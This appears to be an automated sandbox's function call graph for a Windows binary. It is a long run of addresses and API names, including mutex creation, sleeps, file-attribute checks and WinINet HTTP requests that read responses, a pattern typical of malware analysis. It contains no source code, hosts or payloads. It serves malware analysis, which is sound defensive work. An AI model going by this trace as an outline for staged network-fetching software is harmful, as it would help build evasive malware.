__ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37300->37302 37305 bb70af 37300->37305 37306 bb70be 37300->37306 37301->37302 37304 bb7028 GetFileInformationByHandle 37301->37304 37302->37265 37304->37306 37307 bb703e 37304->37307 37308 bb75f6 __dosmaperr RtlAllocateHeap 37305->37308 37340 bb75c0 RtlAllocateHeap __dosmaperr 37306->37340 37324 bb727c 37307->37324 37308->37302 37313 bb705b 37314 bb7124 SystemTimeToTzSpecificLocalTime 37313->37314 37315 bb706e 37314->37315 37316 bb7124 SystemTimeToTzSpecificLocalTime 37315->37316 37317 bb7085 37316->37317 37339 bb7249 RtlAllocateHeap __dosmaperr 37317->37339 37319->37247 37320->37260 37321->37255 37322->37264 37323->37265 37325 bb7292 _wcsrchr 37324->37325 37333 bb704a 37325->37333 37341 bbbc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 37325->37341 37327 bb72d6 37327->37333 37342 bbbc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 37327->37342 37329 bb72e7 37329->37333 37343 bbbc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 37329->37343 37331 bb72f8 37331->37333 37344 bbbc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 37331->37344 37334 bb7124 37333->37334 37335 bb713c 37334->37335 37336 bb715c SystemTimeToTzSpecificLocalTime 37335->37336 37337 bb7142 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37335->37337 37336->37337 37337->37313 37338->37301 37339->37302 37340->37302 37341->37327 37342->37329 37343->37331 37344->37333 37345 b8a079 GetFileAttributesA 37346 b8a089 Concurrency::details::LockQueueNode::DerefTimerNode 37345->37346 37347 b8a930 37346->37347 37349 b8a154 Concurrency::details::LockQueueNode::DerefTimerNode 37346->37349 37348 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37347->37348 37350 b8a953 Sleep CreateMutexA 37348->37350 37351 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37349->37351 37355 b8a98e 37350->37355 37353 b8a903 37351->37353 37354 b8a9a7 37355->37354 37358 bb6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 37355->37358 37357 b8a9b0 37358->37357 37373 bbac53 37378 bbaa29 37373->37378 37376 bbac92 37379 bbaa48 37378->37379 37380 bbaa5b 37379->37380 37389 bbaa70 37379->37389 37381 bb75f6 __dosmaperr RtlAllocateHeap 37380->37381 37382 bbaa60 37381->37382 37398 bb6c5a RtlAllocateHeap ___std_exception_copy 37382->37398 37384 bbab90 37385 bbaa6b 37384->37385 37386 bb75f6 __dosmaperr RtlAllocateHeap 37384->37386 37385->37376 37395 bc1a9c 37385->37395 37387 bbac41 37386->37387 37402 bb6c5a RtlAllocateHeap ___std_exception_copy 37387->37402 37389->37384 37399 bc132b GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 37389->37399 37391 bbabe0 37391->37384 37400 bc132b GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 37391->37400 37393 bbabfe 37393->37384 37401 bc132b GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 37393->37401 37403 bc1461 37395->37403 37397 bc1ab7 37397->37376 37398->37385 37399->37391 37400->37393 37401->37384 37402->37385 37406 bc146d __FrameHandler3::FrameUnwindToState 37403->37406 37404 bc1474 37405 bb75f6 __dosmaperr RtlAllocateHeap 37404->37405 37407 bc1479 37405->37407 37406->37404 37408 bc149f 37406->37408 37421 bb6c5a RtlAllocateHeap ___std_exception_copy 37407->37421 37412 bc1a2e 37408->37412 37411 bc1483 __wsopen_s 37411->37397 37413 bb698d __wsopen_s 3 API calls 37412->37413 37414 bc1a50 37413->37414 37415 bb68ed __wsopen_s 2 API calls 37414->37415 37416 bc1a5d 37415->37416 37417 bc1a64 37416->37417 37422 bc1abc 37416->37422 37419 bc1a96 37417->37419 37420 bbadf5 ___free_lconv_mon RtlAllocateHeap 37417->37420 37419->37411 37420->37419 37421->37411 37464 bc180a 37422->37464 37424 bc1ad9 37425 bc1aee 37424->37425 37426 bc1b07 37424->37426 37483 bb75e3 RtlAllocateHeap __dosmaperr 37425->37483 37478 bbbf3a 37426->37478 37429 bc1af3 37433 bb75f6 __dosmaperr RtlAllocateHeap 37429->37433 37430 bc1b0c 37431 bc1b2c 37430->37431 37432 bc1b15 37430->37432 37482 bc1775 CreateFileW 37431->37482 37484 bb75e3 RtlAllocateHeap __dosmaperr 37432->37484 37460 bc1b00 37433->37460 37436 bc1b1a 37438 bb75f6 __dosmaperr RtlAllocateHeap 37436->37438 37437 bc1be2 GetFileType 37440 bc1bed 37437->37440 37441 bc1c34 37437->37441 37438->37429 37439 bc1bb7 37486 bb75c0 RtlAllocateHeap __dosmaperr 37439->37486 37487 bb75c0 RtlAllocateHeap __dosmaperr 37440->37487 37488 bbbe85 RtlAllocateHeap __dosmaperr __wsopen_s 37441->37488 37442 bc1b65 37442->37437 37442->37439 37485 bc1775 CreateFileW 37442->37485 37444 bc1baa 37444->37437 37444->37439 37448 bc1bfb 37448->37429 37455 bb75f6 __dosmaperr RtlAllocateHeap 37448->37455 37449 bc1c55 37450 bc1ca1 37449->37450 37489 bc1984 4 API calls 2 library calls 37449->37489 37454 bc1ca8 37450->37454 37491 bc1522 4 API calls 3 library calls 37450->37491 37453 bc1cd6 37453->37454 37457 bc1ce4 37453->37457 37490 bbaf48 RtlAllocateHeap __dosmaperr __wsopen_s 37454->37490 37455->37429 37457->37460 37492 bc1775 CreateFileW 37457->37492 37459 bc1d8b 37459->37460 37493 bb75c0 RtlAllocateHeap __dosmaperr 37459->37493 37460->37417 37462 bc1da1 37494 bbc04d RtlAllocateHeap __dosmaperr __wsopen_s 37462->37494 37465 bc182b 37464->37465 37466 bc1845 37464->37466 37465->37466 37468 bb75f6 __dosmaperr RtlAllocateHeap 37465->37468 37495 bc179a 37466->37495 37470 bc183a 37468->37470 37469 bc187d 37472 bc18ac 37469->37472 37474 bb75f6 __dosmaperr RtlAllocateHeap 37469->37474 37502 bb6c5a RtlAllocateHeap ___std_exception_copy 37470->37502 37477 bc18fa ___std_exception_copy 37472->37477 37504 bb9b60 RtlAllocateHeap __dosmaperr ___std_exception_copy 37472->37504 37475 bc18a1 37474->37475 37503 bb6c5a RtlAllocateHeap ___std_exception_copy 37475->37503 37477->37424 37481 bbbf46 __FrameHandler3::FrameUnwindToState CallUnexpected 37478->37481 37480 bbbf77 __wsopen_s 37480->37430 37481->37480 37506 bbbd14 37481->37506 37482->37442 37483->37429 37484->37436 37485->37444 37486->37429 37487->37448 37488->37449 37489->37450 37490->37460 37491->37453 37492->37459 37493->37462 37494->37460 37496 bc17b2 37495->37496 37497 bc17cd 37496->37497 37498 bb75f6 __dosmaperr RtlAllocateHeap 37496->37498 37497->37469 37499 bc17f1 37498->37499 37505 bb6c5a RtlAllocateHeap ___std_exception_copy 37499->37505 37501 bc17fc 37501->37469 37502->37466 37503->37472 37504->37477 37505->37501 37511 bbd82f 37506->37511 37508 bbbd26 __wsopen_s 37509 bbadf5 ___free_lconv_mon RtlAllocateHeap 37508->37509 37510 bbbd88 37509->37510 37510->37480 37514 bbd83c ListArray _unexpected 37511->37514 37512 bbd867 RtlAllocateHeap 37513 bbd87a __dosmaperr 37512->37513 37512->37514 37513->37508 37514->37512 37514->37513 37529 b90cad 37530 b90f13 Concurrency::details::LockQueueNode::DerefTimerNode 37529->37530 37569 b97a00 37530->37569 37532 b90f34 37533 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37532->37533 37534 b90f46 37533->37534 37583 b8c360 37534->37583 37536 b90f4f 37588 bb6729 37536->37588 37540 b90f7f 37541 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37540->37541 37544 b90f94 Concurrency::details::LockQueueNode::DerefTimerNode 37541->37544 37542 bb75f6 __dosmaperr RtlAllocateHeap 37543 b9101e 37542->37543 37600 bb8ab6 37543->37600 37544->37542 37546 b91168 37544->37546 37548 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37549 b9109d 37548->37549 37550 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37549->37550 37551 b910b8 37550->37551 37552 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37551->37552 37553 b910cd 37552->37553 37604 b87590 Sleep 37553->37604 37555 b910d6 37556 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37555->37556 37557 b91100 37556->37557 37622 b85c10 37557->37622 37559 b91107 37560 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37559->37560 37561 b9111d 37560->37561 37562 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37561->37562 37563 b91135 37562->37563 37564 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37563->37564 37565 b9114d 37564->37565 37566 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37565->37566 37567 b9115f 37566->37567 37634 b8e530 37567->37634 37570 b97a26 37569->37570 37571 b97a2d 37570->37571 37572 b97a81 37570->37572 37573 b97a62 37570->37573 37571->37532 37578 b9d3e2 ListArray 2 API calls 37572->37578 37581 b97a76 std::_Rethrow_future_exception 37572->37581 37574 b97ab9 37573->37574 37575 b97a69 37573->37575 37788 b82480 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback CallUnexpected 37574->37788 37577 b9d3e2 ListArray 2 API calls 37575->37577 37579 b97a6f 37577->37579 37578->37581 37580 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37579->37580 37579->37581 37582 b97ac3 __Cnd_destroy_in_situ __Mtx_destroy_in_situ Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::_TaskCollection::~_TaskCollection Concurrency::details::LockQueueNode::DerefTimerNode 37580->37582 37581->37532 37582->37532 37584 b8c839 37583->37584 37585 b8c8a1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z Concurrency::details::LockQueueNode::DerefTimerNode 37584->37585 37586 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37584->37586 37585->37536 37587 b8c8db 37586->37587 37789 bb6672 37588->37789 37590 b90f6e 37591 bb67b7 37590->37591 37592 bb67c3 __FrameHandler3::FrameUnwindToState 37591->37592 37593 bb67cd 37592->37593 37596 bb67e2 ___scrt_uninitialize_crt 37592->37596 37594 bb75f6 __dosmaperr RtlAllocateHeap 37593->37594 37595 bb67d2 37594->37595 37814 bb6c5a RtlAllocateHeap ___std_exception_copy 37595->37814 37598 bb67dd 37596->37598 37815 bb6740 3 API calls 4 library calls 37596->37815 37598->37540 37601 bb8ad1 37600->37601 37816 bb8868 37601->37816 37605 b8765e 37604->37605 37606 b875e3 37604->37606 37607 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37605->37607 37846 b9d111 SleepConditionVariableCS 37606->37846 37610 b8767a 37607->37610 37609 b875ed 37609->37605 37847 b9d64e RtlAllocateHeap RtlAllocateHeap 37609->37847 37611 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37610->37611 37613 b87693 37611->37613 37615 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37613->37615 37614 b87654 37848 b9d0c7 RtlWakeAllConditionVariable 37614->37848 37617 b876ac CreateThread Sleep 37615->37617 37619 b876d9 Concurrency::details::LockQueueNode::DerefTimerNode 37617->37619 37849 b87430 37617->37849 37618 b8777f Concurrency::details::LockQueueNode::DerefTimerNode 37618->37555 37619->37618 37620 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37619->37620 37621 b877a0 37620->37621 37862 b85940 37622->37862 37626 b85c6a 37886 b84b30 37626->37886 37628 b85d17 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z Concurrency::details::LockQueueNode::DerefTimerNode 37628->37559 37629 b85c7b Concurrency::details::LockQueueNode::DerefTimerNode 37630 b85ce7 Concurrency::details::LockQueueNode::DerefTimerNode 37629->37630 37631 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37629->37631 37630->37628 37632 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37630->37632 37631->37630 37633 b85d47 37632->37633 37635 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37634->37635 37636 b8e576 37635->37636 37637 b85c10 5 API calls 37636->37637 37638 b8e581 37637->37638 37639 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37638->37639 37640 b8e59c 37639->37640 37641 b85c10 5 API calls 37640->37641 37642 b8e5a7 37641->37642 37900 b99280 37642->37900 37644 b8e5ba 37905 b98320 37644->37905 37646 b8e5fc 37909 b98220 37646->37909 37648 b8e60d 37649 b98320 2 API calls 37648->37649 37650 b8e61e 37649->37650 37651 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37650->37651 37652 b8e7cb 37651->37652 37653 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37652->37653 37654 b8e7e0 37653->37654 37655 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37654->37655 37656 b8e7f2 37655->37656 37917 b8be30 37656->37917 37658 b8e7fe 37659 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37658->37659 37660 b8e813 37659->37660 37661 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37660->37661 37662 b8e82b 37661->37662 37663 b85c10 5 API calls 37662->37663 37664 b8e832 37663->37664 37944 b88580 37664->37944 37666 b8e83e 37667 b8ea8f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z Concurrency::details::LockQueueNode::DerefTimerNode 37666->37667 37668 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37666->37668 37667->37546 37669 b8eabd 37668->37669 37670 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37669->37670 37671 b8eac2 37670->37671 37672 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37671->37672 37673 b8eb19 37672->37673 37674 b85c10 5 API calls 37673->37674 37675 b8eb21 37674->37675 37953 b983c0 37675->37953 37677 b8eb36 37678 b98220 2 API calls 37677->37678 37679 b8eb45 GetFileAttributesA 37678->37679 37681 b8eb62 37679->37681 37682 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37681->37682 37683 b8ed60 37682->37683 37684 b85c10 5 API calls 37683->37684 37685 b8ed68 37684->37685 37686 b983c0 2 API calls 37685->37686 37687 b8ed7d 37686->37687 37688 b98220 2 API calls 37687->37688 37689 b8ed8c GetFileAttributesA 37688->37689 37693 b8eda9 37689->37693 37691 b8f699 Concurrency::details::LockQueueNode::DerefTimerNode 37691->37546 37692 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37692->37693 37693->37691 37693->37692 37694 b8f6cb 37693->37694 37695 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37694->37695 37696 b8f6d0 37695->37696 37697 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37696->37697 37698 b8f727 37697->37698 37699 b85c10 5 API calls 37698->37699 37700 b8f72e 37699->37700 37701 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37700->37701 37702 b8f741 37701->37702 37703 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37702->37703 37704 b8f756 37703->37704 37705 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37704->37705 37706 b8f76b 37705->37706 37707 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37706->37707 37708 b8f77d 37707->37708 37709 b8e530 11 API calls 37708->37709 37710 b8f786 37709->37710 37711 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37710->37711 37712 b8f7aa 37711->37712 37713 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37712->37713 37714 b8f7ba 37713->37714 37715 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37714->37715 37716 b8f7d7 37715->37716 37717 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37716->37717 37719 b8f7f0 37717->37719 37718 b8f982 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z Concurrency::details::LockQueueNode::DerefTimerNode 37718->37546 37719->37718 37720 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37719->37720 37721 b8f9b0 37720->37721 37722 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37721->37722 37723 b8fa04 37722->37723 37724 b85c10 5 API calls 37723->37724 37725 b8fa0b 37724->37725 37726 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37725->37726 37727 b8fa1e 37726->37727 37728 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37727->37728 37729 b8fa33 37728->37729 37730 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37729->37730 37731 b8fa48 37730->37731 37732 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37731->37732 37733 b8fa5a 37732->37733 37734 b8e530 11 API calls 37733->37734 37736 b8fa63 37734->37736 37735 b8fb35 Concurrency::details::LockQueueNode::DerefTimerNode 37735->37546 37736->37735 37737 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37736->37737 37738 b8fb54 37737->37738 37739 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37738->37739 37740 b8fba5 37739->37740 37961 b89580 5 API calls 3 library calls 37740->37961 37742 b8fbb4 37962 b89230 5 API calls 3 library calls 37742->37962 37744 b8fbc3 37745 b98320 2 API calls 37744->37745 37746 b8fbdb 37745->37746 37746->37746 37747 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37746->37747 37748 b8fc8c 37747->37748 37749 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37748->37749 37750 b8fca7 37749->37750 37751 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37750->37751 37752 b8fcb9 37751->37752 37753 b8c360 RtlAllocateHeap 37752->37753 37754 b8fcc2 37753->37754 37755 bb6729 RtlAllocateHeap 37754->37755 37756 b8fce1 37755->37756 37757 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37756->37757 37758 b905d4 37757->37758 37759 b85c10 5 API calls 37758->37759 37760 b905db 37759->37760 37761 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37760->37761 37762 b905f1 37761->37762 37763 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37762->37763 37764 b90609 37763->37764 37765 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37764->37765 37766 b90621 37765->37766 37767 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37766->37767 37768 b90633 37767->37768 37769 b8e530 11 API calls 37768->37769 37771 b9063c 37769->37771 37770 b90880 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z Concurrency::details::LockQueueNode::DerefTimerNode 37770->37546 37771->37770 37772 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37771->37772 37773 b908d3 37772->37773 37774 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37773->37774 37775 b90987 37774->37775 37776 b85c10 5 API calls 37775->37776 37777 b9098e 37776->37777 37778 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37777->37778 37779 b909a4 37778->37779 37780 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37779->37780 37781 b909bc 37780->37781 37782 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37781->37782 37783 b909d4 37782->37783 37784 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37783->37784 37785 b912e0 37784->37785 37786 b8e530 11 API calls 37785->37786 37787 b912e9 37786->37787 37788->37579 37792 bb667e __FrameHandler3::FrameUnwindToState 37789->37792 37790 bb6685 37791 bb75f6 __dosmaperr RtlAllocateHeap 37790->37791 37793 bb668a 37791->37793 37792->37790 37794 bb66a5 37792->37794 37807 bb6c5a RtlAllocateHeap ___std_exception_copy 37793->37807 37796 bb66aa 37794->37796 37797 bb66b7 37794->37797 37798 bb75f6 __dosmaperr RtlAllocateHeap 37796->37798 37803 bba8c3 37797->37803 37802 bb6695 37798->37802 37800 bb66c0 37801 bb75f6 __dosmaperr RtlAllocateHeap 37800->37801 37800->37802 37801->37802 37802->37590 37804 bba8cf __FrameHandler3::FrameUnwindToState CallUnexpected 37803->37804 37808 bba967 37804->37808 37806 bba8ea 37806->37800 37807->37802 37812 bba98a ___scrt_uninitialize_crt 37808->37812 37809 bbd82f _unexpected RtlAllocateHeap 37810 bba9eb 37809->37810 37811 bbadf5 ___free_lconv_mon RtlAllocateHeap 37810->37811 37813 bba9d0 ___scrt_uninitialize_crt __wsopen_s 37811->37813 37812->37809 37812->37812 37812->37813 37813->37806 37814->37598 37815->37598 37834 bb868d 37816->37834 37818 bb88b3 37819 bb690a __fassign 3 API calls 37818->37819 37826 bb88bf 37819->37826 37820 bb887a 37820->37818 37821 bb888f 37820->37821 37833 b9104d 37820->37833 37822 bb75f6 __dosmaperr RtlAllocateHeap 37821->37822 37823 bb8894 37822->37823 37841 bb6c5a RtlAllocateHeap ___std_exception_copy 37823->37841 37827 bb88ee 37826->37827 37842 bb6d52 4 API calls 2 library calls 37826->37842 37830 bb8958 37827->37830 37843 bb8a8d RtlAllocateHeap __dosmaperr ___std_exception_copy 37827->37843 37844 bb8a8d RtlAllocateHeap __dosmaperr ___std_exception_copy 37830->37844 37831 bb8a20 37832 bb75f6 __dosmaperr RtlAllocateHeap 37831->37832 37831->37833 37832->37833 37833->37546 37833->37548 37835 bb8692 37834->37835 37836 bb86a5 37834->37836 37837 bb75f6 __dosmaperr RtlAllocateHeap 37835->37837 37836->37820 37838 bb8697 37837->37838 37845 bb6c5a RtlAllocateHeap ___std_exception_copy 37838->37845 37840 bb86a2 37840->37820 37841->37833 37842->37826 37843->37830 37844->37831 37845->37840 37846->37609 37847->37614 37848->37605 37850 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37849->37850 37851 b87465 37850->37851 37852 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37851->37852 37853 b87478 37852->37853 37854 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37853->37854 37855 b87488 37854->37855 37856 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37855->37856 37857 b8749d 37856->37857 37858 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37857->37858 37859 b874b2 37858->37859 37860 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37859->37860 37861 b874c4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z Concurrency::details::LockQueueNode::DerefTimerNode 37860->37861 37893 b97f80 2 API calls 4 library calls 37862->37893 37864 b8596b 37865 b859e0 37864->37865 37894 b97f80 2 API calls 4 library calls 37865->37894 37867 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37877 b85a45 37867->37877 37868 b85c09 37896 b98200 RtlAllocateHeap RtlAllocateHeap 37868->37896 37869 b85bdd __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37869->37626 37871 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37871->37877 37877->37867 37877->37868 37877->37869 37877->37871 37895 b85730 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z Concurrency::details::LockQueueNode::DerefTimerNode 37877->37895 37887 b84dc2 37886->37887 37891 b84b92 37886->37891 37887->37629 37889 b84ce5 37889->37887 37899 b98ca0 2 API calls 4 library calls 37889->37899 37891->37889 37897 bb6da6 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap __fassign 37891->37897 37898 b98ca0 2 API calls 4 library calls 37891->37898 37893->37864 37894->37877 37895->37877 37897->37891 37898->37891 37899->37889 37901 b99294 37900->37901 37904 b992a5 __InternalCxxFrameHandler std::_Rethrow_future_exception 37901->37904 37963 b994e0 2 API calls 4 library calls 37901->37963 37903 b9932b 37903->37644 37904->37644 37907 b98339 37905->37907 37906 b9834d __InternalCxxFrameHandler 37906->37646 37907->37906 37964 b98f40 2 API calls 4 library calls 37907->37964 37910 b98248 37909->37910 37911 b98292 37909->37911 37910->37911 37912 b98251 37910->37912 37914 b982a1 __InternalCxxFrameHandler 37911->37914 37965 b98f40 2 API calls 4 library calls 37911->37965 37913 b99280 2 API calls 37912->37913 37915 b9825a 37913->37915 37914->37648 37915->37648 37918 b8c281 37917->37918 37919 b8be82 37917->37919 37920 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37918->37920 37919->37918 37921 b8be96 Sleep InternetOpenW InternetConnectA 37919->37921 37928 b8c22e Concurrency::details::LockQueueNode::DerefTimerNode 37920->37928 37922 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37921->37922 37923 b8bf18 37922->37923 37925 b85c10 5 API calls 37923->37925 37924 b8c27c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z Concurrency::details::LockQueueNode::DerefTimerNode 37924->37658 37926 b8bf23 HttpOpenRequestA 37925->37926 37931 b8bf4c Concurrency::details::LockQueueNode::DerefTimerNode 37926->37931 37927 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37930 b8c354 37927->37930 37928->37924 37928->37927 37932 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37931->37932 37933 b8bfb4 37932->37933 37934 b85c10 5 API calls 37933->37934 37935 b8bfbf 37934->37935 37936 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37935->37936 37937 b8bfd8 37936->37937 37938 b85c10 5 API calls 37937->37938 37939 b8bfe3 HttpSendRequestA 37938->37939 37941 b8c006 Concurrency::details::LockQueueNode::DerefTimerNode 37939->37941 37942 b8c08e InternetReadFile 37941->37942 37943 b8c0b5 __InternalCxxFrameHandler 37942->37943 37951 b886a0 Concurrency::details::LockQueueNode::DerefTimerNode 37944->37951 37952 b885d5 Concurrency::details::LockQueueNode::DerefTimerNode 37944->37952 37945 b88767 37966 b98200 RtlAllocateHeap RtlAllocateHeap 37945->37966 37946 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37946->37952 37948 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37950 b88771 37948->37950 37949 b88740 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z Concurrency::details::LockQueueNode::DerefTimerNode 37949->37666 37951->37948 37951->37949 37952->37945 37952->37946 37952->37951 37967 b97760 37953->37967 37955 b98439 37957 b98454 __InternalCxxFrameHandler 37955->37957 37981 b98f40 2 API calls 4 library calls 37955->37981 37960 b984a8 __InternalCxxFrameHandler 37957->37960 37982 b98f40 2 API calls 4 library calls 37957->37982 37959 b984ee 37959->37677 37960->37677 37961->37742 37962->37744 37963->37903 37964->37906 37965->37914 37969 b9777b 37967->37969 37980 b97864 std::_Rethrow_future_exception Concurrency::details::LockQueueNode::DerefTimerNode 37967->37980 37968 b978f1 37983 b99270 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37968->37983 37969->37968 37972 b977fb std::_Rethrow_future_exception 37969->37972 37973 b977ea 37969->37973 37974 b97811 37969->37974 37969->37980 37971 b978f6 37984 b82480 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback CallUnexpected 37971->37984 37979 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37972->37979 37972->37980 37973->37971 37977 b9d3e2 ListArray 2 API calls 37973->37977 37974->37972 37978 b9d3e2 ListArray 2 API calls 37974->37978 37976 b978fb 37977->37972 37978->37972 37979->37968 37980->37955 37981->37957 37982->37959 37984->37976 37985 b8a54d GetFileAttributesA 37986 b8a55d Concurrency::details::LockQueueNode::DerefTimerNode 37985->37986 37987 b8a944 37986->37987 37988 b8a628 Concurrency::details::LockQueueNode::DerefTimerNode 37986->37988 37989 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37987->37989 37991 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37988->37991 37990 b8a949 37989->37990 37992 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37990->37992 37993 b8a903 37991->37993 37994 b8a94e 37992->37994 37995 b8a953 Sleep CreateMutexA 37994->37995 37996 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37994->37996 37999 b8a98e 37995->37999 37996->37995 37998 b8a9a7 37999->37998 38002 bb6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 37999->38002 38001 b8a9b0 38002->38001 